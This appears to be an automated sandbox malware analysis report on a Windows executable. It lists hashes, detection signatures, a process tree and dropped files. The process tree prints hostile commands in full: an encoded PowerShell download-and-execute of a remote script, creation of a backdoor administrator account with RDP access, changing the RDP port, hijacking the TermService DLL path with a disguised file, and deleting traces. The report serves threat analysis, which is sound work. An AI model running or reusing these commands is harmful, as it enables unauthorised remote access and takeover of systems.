Analysis

  • max time kernel
    61s
  • max time network
    115s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-08-2021 08:09

General

  • Target

    bfe0ac25eeeb759f7c8e06229c7313a2.exe

  • Size

    5.9MB

  • MD5

    bfe0ac25eeeb759f7c8e06229c7313a2

  • SHA1

    199c1fbd29f9ec98b83464763dac63ef80998bb3

  • SHA256

    be9c5e5ce6d4544e6bddbd47c26873fe0c33414086824b1d4968a638184a8a7c

  • SHA512

    a0f3b477de1603d7e032608692857a4865059ba61ae1276334f281970a1484a6c81463fba2a2bbc9821c016e06e206d621fdb97e8743fc60e3515fba88997a72

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe
    "C:\Users\Admin\AppData\Local\Temp\bfe0ac25eeeb759f7c8e06229c7313a2.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:996
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l5a5vaev\l5a5vaev.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:808
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9204.tmp" "c:\Users\Admin\AppData\Local\Temp\l5a5vaev\CSC41B3D41B62A4A5CA5DF6D399998BF0.TMP"
          4⤵
            PID:2104
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1144
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3976
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3868
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:4004
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:904
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3176
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:1144
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2364
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1344
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2192
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:2256
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3756
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1304
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3748
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:3112
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:2332
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2756
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3724
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2112
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:3176
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc k85dqMSN /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3184
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc k85dqMSN /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1244
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc k85dqMSN /add
                          3⤵
                            PID:1340
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:804
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3840
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:2844
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3176
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2164
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                              3⤵
                                PID:2252
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2192
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:904
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                3⤵
                                  PID:2272
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user WgaUtilAcc k85dqMSN
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3960
                              • C:\Windows\system32\net.exe
                                net.exe user WgaUtilAcc k85dqMSN
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3008
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user WgaUtilAcc k85dqMSN
                                  3⤵
                                    PID:3188
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2268
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                    PID:4004
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic CPU get NAME
                                  1⤵
                                    PID:3176
                                    • C:\Windows\System32\Wbem\WMIC.exe
                                      wmic CPU get NAME
                                      2⤵
                                        PID:3880
                                    • C:\Windows\System32\cmd.exe
                                      cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      1⤵
                                        PID:1680
                                        • C:\Windows\system32\cmd.exe
                                          cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                          2⤵
                                            PID:1960
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                              3⤵
                                              • Blocklisted process makes network request
                                              • Drops file in Program Files directory
                                              • Drops file in Windows directory
                                              • Modifies data under HKEY_USERS
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2268

                                        Network

                                        MITRE ATT&CK Enterprise v6

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Temp\RES9204.tmp

                                          MD5

                                          0e770c7e25b5ff40895bd0abd52d18ed

                                          SHA1

                                          ad4356ac5f8c166a3a63c4398946dadb89648be6

                                          SHA256

                                          12397f7f126a761a25e2a230e0cb2a02ed5de4d4f1dc48f3ee7e38d09e239613

                                          SHA512

                                          f00d7d03ea85cef46f73a803d65b354c864c8f69e53ffa6e996c758bde8874173a8b5e42cf0802f14bc4fcaf92f7ab7e08c09845518f7b5bf8294f3f5ca3a357

                                        • C:\Users\Admin\AppData\Local\Temp\l5a5vaev\l5a5vaev.dll

                                          MD5

                                          0a5d80710c027d178c58bfd063b7358f

                                          SHA1

                                          b7dcc77ed46dceb46740d4604591dfdccfac15da

                                          SHA256

                                          eba64151eac6bf3d24fb9118f3688688fd62a041ed36b580dab6c0cf456a6d74

                                          SHA512

                                          1b27a7d2e0506ce8477c61ee642c55ea9ec92368d01270e3fb451d83662214bf2dc99d9bbb8143a02b298d68f5e6175a137f25f23d3a6c3a702c0b374cce09c5

                                        • C:\Users\Admin\AppData\Local\Temp\ready.ps1

                                          MD5

                                          3447df88de7128bdc34942334b2fab98

                                          SHA1

                                          519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

                                          SHA256

                                          9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

                                          SHA512

                                          2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

                                        • C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

                                          MD5

                                          6938a2a0fa3adc1ab9cc3bb479ff0e74

                                          SHA1

                                          37e2117cf83cdf1a631a394ce6f0c57f70ee3f47

                                          SHA256

                                          df16833eb7975ca070466bf2f655e078508a59968d8f50f14a8ff7873008d068

                                          SHA512

                                          5509bae8342bfc482a671258fe3012247f89b2449e84f6c42a4dd0bc73cd4177fff6d581c3615214fc0b5f115a77e24213c5dd37f8c0631eb9064349c33eec79

                                        • \??\c:\Users\Admin\AppData\Local\Temp\l5a5vaev\CSC41B3D41B62A4A5CA5DF6D399998BF0.TMP

                                          MD5

                                          fb53697f840e14272413f6c0fc3d9b40

                                          SHA1

                                          7f68d814989d99abf0b1bc0866c71f4176a2b971

                                          SHA256

                                          4940a2ff346c667006a52f1ca5107e874bd213458041f5b27b8abf3dee41c70e

                                          SHA512

                                          05ae5d9e37e0ba2f18245292304938e83ad36f78ecedc031673b52f3fdf7689dacf55965a4ca722b62486c1cc6b95cb96b60e0e8cfb945b8794557e9275b3f1d

                                        • \??\c:\Users\Admin\AppData\Local\Temp\l5a5vaev\l5a5vaev.0.cs

                                          MD5

                                          4864fc038c0b4d61f508d402317c6e9a

                                          SHA1

                                          72171db3eea76ecff3f7f173b0de0d277b0fede7

                                          SHA256

                                          0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

                                          SHA512

                                          9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

                                        • \??\c:\Users\Admin\AppData\Local\Temp\l5a5vaev\l5a5vaev.cmdline

                                          MD5

                                          a165727b81025658f7479a3fb4b3114e

                                          SHA1

                                          d1a8fc81c40fd1eebbdbeef18b3a72b5df59c58d

                                          SHA256

                                          8a1bb80788626d68925fecfb8511fea3ee5f036c750273d0ac926d1d5fbd57ad

                                          SHA512

                                          eb7d26d552131aa2dac78451373a7ebebd40669c9895e70af5211f7a1e676d1ba2bd5749407a0a9e9f0bcd86fd2fbaa40ba8880e6688c999cca4a2c872fe5a8b

                                        • \Windows\Branding\mediasrv.png

                                          MD5

                                          70d1bf1c7a95f0613358ac07bc3864ad

                                          SHA1

                                          52783a6ace472471ad68b602c604e48340737596

                                          SHA256

                                          88e639c34e7798f2e51a121db7e0dedc7c5f4bfa95963bb5c93bcb221e0127c3

                                          SHA512

                                          ed5e46ee00e735ca09c5cf4dfed311a4229ff08e9d626c1afa2ed6cc7543f8808259f9553666844ebf25d775b20af0a9bafe59c3b525a6918db1e8c7f70e4fb5

                                        • \Windows\Branding\mediasvc.png

                                          MD5

                                          58b4c6a70f55d70a401015da300261b2

                                          SHA1

                                          a13b8a1a577c3638c311f5e668b61cea8a532d35

                                          SHA256

                                          9eaa1a087f7aaa768134c540941584fdc2cd8d050b375a36ded9d1cdf7fb7fe0

                                          SHA512

                                          0ae4aaf9f6383b752b824f86e9ae10983e9f00df9868efa3a1c5e1f2bfae062e43458260c7a379b7d6f711f4ef6a6f22035cc4cd21d7ba1b3c7a5e10f8f06289

                                        • memory/808-136-0x0000000000000000-mapping.dmp

                                        • memory/904-356-0x0000000000000000-mapping.dmp

                                        • memory/904-297-0x0000000000000000-mapping.dmp

                                        • memory/996-129-0x000002444F580000-0x000002444F582000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/996-151-0x00000244500C0000-0x00000244500C1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/996-139-0x000002444F586000-0x000002444F588000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/996-128-0x000002444F810000-0x000002444F811000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/996-125-0x000002444F530000-0x000002444F531000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/996-120-0x0000000000000000-mapping.dmp

                                        • memory/996-130-0x000002444F583000-0x000002444F585000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/996-144-0x000002444F570000-0x000002444F571000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/996-152-0x000002444F588000-0x000002444F589000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/996-150-0x000002444FD30000-0x000002444FD31000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1032-119-0x0000024FB69F6000-0x0000024FB69F7000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1032-118-0x0000024FB69F5000-0x0000024FB69F6000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1032-114-0x0000024FCF530000-0x0000024FCF950000-memory.dmp

                                          Filesize

                                          4.1MB

                                        • memory/1032-117-0x0000024FB69F3000-0x0000024FB69F5000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1032-116-0x0000024FB69F0000-0x0000024FB69F2000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1144-201-0x0000000000000000-mapping.dmp

                                        • memory/1144-209-0x000001D4BC960000-0x000001D4BC962000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1144-210-0x000001D4BC963000-0x000001D4BC965000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1144-235-0x000001D4BC966000-0x000001D4BC968000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/1144-335-0x0000000000000000-mapping.dmp

                                        • memory/1244-350-0x0000000000000000-mapping.dmp

                                        • memory/1304-343-0x0000000000000000-mapping.dmp

                                        • memory/1340-351-0x0000000000000000-mapping.dmp

                                        • memory/1344-339-0x0000000000000000-mapping.dmp

                                        • memory/1960-362-0x0000000000000000-mapping.dmp

                                        • memory/2104-140-0x0000000000000000-mapping.dmp

                                        • memory/2112-348-0x0000000000000000-mapping.dmp

                                        • memory/2164-354-0x0000000000000000-mapping.dmp

                                        • memory/2192-340-0x0000000000000000-mapping.dmp

                                        • memory/2252-355-0x0000000000000000-mapping.dmp

                                        • memory/2256-341-0x0000000000000000-mapping.dmp

                                        • memory/2268-374-0x0000027651AF0000-0x0000027651AF2000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/2268-397-0x0000027651AF8000-0x0000027651AF9000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2268-375-0x0000027651AF3000-0x0000027651AF5000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/2268-363-0x0000000000000000-mapping.dmp

                                        • memory/2268-378-0x0000027651AF6000-0x0000027651AF8000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/2272-357-0x0000000000000000-mapping.dmp

                                        • memory/2332-442-0x0000000000000000-mapping.dmp

                                        • memory/2364-338-0x0000000000000000-mapping.dmp

                                        • memory/2756-443-0x0000000000000000-mapping.dmp

                                        • memory/2844-353-0x0000000000000000-mapping.dmp

                                        • memory/3008-358-0x0000000000000000-mapping.dmp

                                        • memory/3112-345-0x0000000000000000-mapping.dmp

                                        • memory/3176-349-0x0000000000000000-mapping.dmp

                                        • memory/3176-334-0x0000000000000000-mapping.dmp

                                        • memory/3188-359-0x0000000000000000-mapping.dmp

                                        • memory/3748-344-0x0000000000000000-mapping.dmp

                                        • memory/3756-342-0x0000000000000000-mapping.dmp

                                        • memory/3840-352-0x0000000000000000-mapping.dmp

                                        • memory/3868-295-0x0000000000000000-mapping.dmp

                                        • memory/3880-174-0x00000204C7216000-0x00000204C7218000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3880-361-0x0000000000000000-mapping.dmp

                                        • memory/3880-208-0x00000204C7218000-0x00000204C721A000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3880-169-0x00000204C7213000-0x00000204C7215000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3880-168-0x00000204C7210000-0x00000204C7212000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3880-159-0x0000000000000000-mapping.dmp

                                        • memory/3976-254-0x000001A276323000-0x000001A276325000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3976-240-0x0000000000000000-mapping.dmp

                                        • memory/3976-253-0x000001A276320000-0x000001A276322000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/3976-285-0x000001A276326000-0x000001A276328000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4004-360-0x0000000000000000-mapping.dmp

                                        • memory/4004-296-0x0000000000000000-mapping.dmp